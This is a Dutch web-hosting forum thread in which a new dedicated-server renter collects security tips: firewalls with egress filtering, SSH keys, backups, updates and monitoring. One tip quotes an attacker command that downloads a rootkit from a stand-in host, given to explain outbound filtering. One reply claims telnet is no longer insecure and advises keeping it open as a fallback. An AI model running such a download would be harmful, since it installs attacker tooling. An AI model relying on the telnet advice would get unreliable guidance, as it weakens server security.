Beste webhosters,

Binnenkort neem ik mogelijk mijn eerste dedicated server. Deze wordt door mijn host geinstalleerd (Fedora, apache, ensim enz.) en gebruiksklaar aan mij geleverd, echter is dit wél unmanaged. Ik zou graag willen weten waar ik op moet letten bij o.a. beveiliging van de server en het instellen van de server.

Alvast bedankt,
Alleznet

Misschien een extern bedrijf inschakelen om het beheer op zich te nemen ?
Tenminste dat heb ik ook gedaan, ja kost paar centen, maar als je gehackt word of de zaak loopt in het honderd dan ben jij en je klanten niet echt blij !

Ik zou beginnen met een goede backup en firewall (IPTables).

Maar zonder gekkigheid: waarom Ensim? Ik heb hier helaas teveel nare ervaringen mee gehad om je hier niet voor te waarschuwen :(

Waarom Fedora Core? Wij schakelen nu over naar CentOS omdat je dan minder updates te doen hebt?

Je hebt wel ervaring met Linux && Onderhoud?

Ik vindt Ensim erg prettig om mee te werken, heb er nog nooit problemen mee gehad, en het is hetgeen wat mijn host levert.

Fedora core was een foutje, is toch CentOs.

Betreft onderhoud is dat niet mijn zorg, de server staat wat dat betreft wel onder hun beheer.

Verder is het geen hostingbedrijf o.i.d. het is voor één website. Verder helpen de helpdeskers van het bedrijf wel gewoon altijd mee (ik zit er nu ook alleen dan virtueel), echter is het op papier voor mij.

Origineel geplaatst door alleznet
Ik vindt Ensim erg prettig om mee te werken, heb er nog nooit problemen mee gehad, en het is hetgeen wat mijn host levert.

Ik helaas wel. Backup gemaakt maar niet terug te zetten. Ensim support werkt NIET in het weekend, dus dat gaf een downtime van +- 48 uur.



Betreft onderhoud is dat niet mijn zorg, de server staat wat dat betreft wel onder hun beheer.

Wat is je uiteindelijke vraag dan? :)

Unmanaged is meestal ook echt Unmanaged, dus zonder beveiliging en andere zaken.

Nou, de server wordt gewoon veilig (op het moment van oplevering) aan mij verhuurd. Dus op dat moment is alles (als het goed is) gewoon veilig. Echter hoe kan ik het veilig houden: ofwel, waar vind ik patches en nieuws over wat je moet aanpassen om het veilig te houden?

pcies, maar deze server valt wel onder hun beheer? :?

Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet.

Altijd backups maken, het liefst extern.
Een goede firewall installeren.
Je logs goed bijhouden.

Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld.

/toevoeging
En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server.

"Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet."

De hosting zorgt ervoor dat dit sowieso feilloos werkt.

"Altijd backups maken, het liefst extern."
Gaat zeker gebeuren, doen we nu trouwens ook al.

"Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld."
Nee, liefst ga ik nog de safemode aanzetten voor een extra vorm van veiligheid

"En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server."
testen gaat niet zomaar als je maar één dedicated huurt :P

Nog iemand tips?

Nog specifieke vragen ;)?

Origineel geplaatst door alleznet
"Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet."

De hosting zorgt ervoor dat dit sowieso feilloos werkt.

"Altijd backups maken, het liefst extern."
Gaat zeker gebeuren, doen we nu trouwens ook al.

"Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld."
Nee, liefst ga ik nog de safemode aanzetten voor een extra vorm van veiligheid

"En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server."
testen gaat niet zomaar als je maar één dedicated huurt :P

Een oude testbak thuis wellicht ? =)

Ben momenteel bezig op een relatief nieuwe laptop centos te installeren. Ben gewoon een hoop aan het bekijken, en de verschillen vinden tussen centos en andere linux systemen.

"Nog specifieke vragen"
Is 'nog tips' niet specifiek genoeg? :P

Let inderdaad op updates, zorg ervoor dat je die regelmatig uitvoert.

Eventueel iets als tripwire installeren

Zorg er voor dat alle scripts (cgi/php) draaien onder uid van de klant (suexec etc)

"ChallengeResponseAuthentication no" icm ssh keys

verifieer backups, en probeer eens een "disaster recovery" op een compleet andere machine.

onnodige processen/daemons uitzetten.

Installeer een monitoring tool. (evt ook remote) om te verifieren dat daemons werken.

Installeer sysstat (sar) en zorg dat die draait vanuit cron. (is altijd handig om terug te kijken naar sys stats)

Zorg voor een omvattende iptables firewall, een die niet alleen inkomend verkeer filterd, maar ook uitgaand. (als een cracker via exploit geen wget http://l33t.org/r00tk1t.tar kan uitvoeren is al een goede stap)

Zorg voor een noexec /tmp partitie. (discutabel, ok. Maar ik zie vaak genoeg dat het misbruikt wordt)

Iets dat vrije schijfruimte etc monitord.

Kan nog wel een tijdje doorgaan, maar er zijn veel betere en completere howto pagina's op het net.

Origineel geplaatst door LeaseWeb
Let inderdaad op updates, zorg ervoor dat je die regelmatig uitvoert.


Inderdaad wat LeaseWeb zegt: let op die updates.
Dit is het eerste wat je zou moeten doen als je inlogt op je server...

Direct je OS updaten!

Controleer tevens of je de laatste versies hebt draaien van Apache en eventueel ook je MSQL-database versie.

Origineel geplaatst door frag4u.com


Controleer tevens of je de laatste versies hebt draaien van Apache en eventueel ook je MSQL-database versie.

Let hierbij wel op.

Het kan zijn dat de laatste versie 6.5.4 is, maar de versie 6.2.1-22 vanuit de distributie al wel de security updates bevat.

Als je update naar de laatste versie die beschikbaar is gesteld door de makers, moet dat vaak door de source te compileren. hierdoor worden evt updates vanuit de distributie. (apt-get, yum, up2date etc) niet meer meegenomen en zit je voor altijd vast aan de procedure van source downloaden en compileren.

Mijn (1 vd lsw techs) filosofie is om bij de versie van de distributie te blijven. Een gevolg hiervan is om te kiezen voor een distributie die snel en betrouwbaar updates levert. Een aspect hierbij is de lifecycle van die release. Als de distributie al na 18 maanden stopt met security updates moet je dus verplicht een (meestal) lastige distro upgrade uitvoeren.

Hmm.. ik moet nu stoppen, voordat deze thread een distro war word.

Ok bedankt! Daar kan ik wat mee, de dingen die ik nu op mijn lijstje heb staan zijn:
- firewall (word gedaan)
- SSH alleen vanaf eigen IP (SSH poort aanpassen)
- niet meer rechten dan nodig
- telnet afsluiten
- dagelijkse backup (naar externe ftp)
- MRTG monitoring (word gedaan)
- onnodige services uitzetten (word gedaan)
- OS vaak updaten

Origineel geplaatst door alleznet
Ok bedankt! Daar kan ik wat mee, de dingen die ik nu op mijn lijstje heb staan zijn:
- firewall (word gedaan)
- SSH alleen vanaf eigen IP (SSH poort aanpassen)
- niet meer rechten dan nodig
- telnet afsluiten
- dagelijkse backup (naar externe ftp)
- MRTG monitoring (word gedaan)
- onnodige services uitzetten (word gedaan)
- OS vaak updaten


SSH alleen vanaf eigen IP is niet altijd even handig, stel je bent op een andere locatie en je moet dringend bij je eigen server kun je niet met SSH op je server komen omdat je alleen vanaf je eigen IP op je server kunt komen (of je ISP beslist dat je "even" een ander IP krijgt), verder is SSH op een andere poort wel een aanrader.

Telnet afsluiten zou ik ook niet doen, maar wel op een andere poort zetten (non-priviliged), telnet is niet zo insecure als dat het vroeger is geweest, en mocht je SSH daemon crashen, kun je altijd nog even snel via telnet inloggen en je ssh daemon restarten.

Edit:

Allow Remote Root access uitschakelen op je SSH voorkomt ook al veel problemen, installeer sudo of su vanaf een gebruikers account naar root als je root priviliges nodig hebt!

Ok bedankt voor deze nuttige tips. Ik heb mijn lijstje aangepast.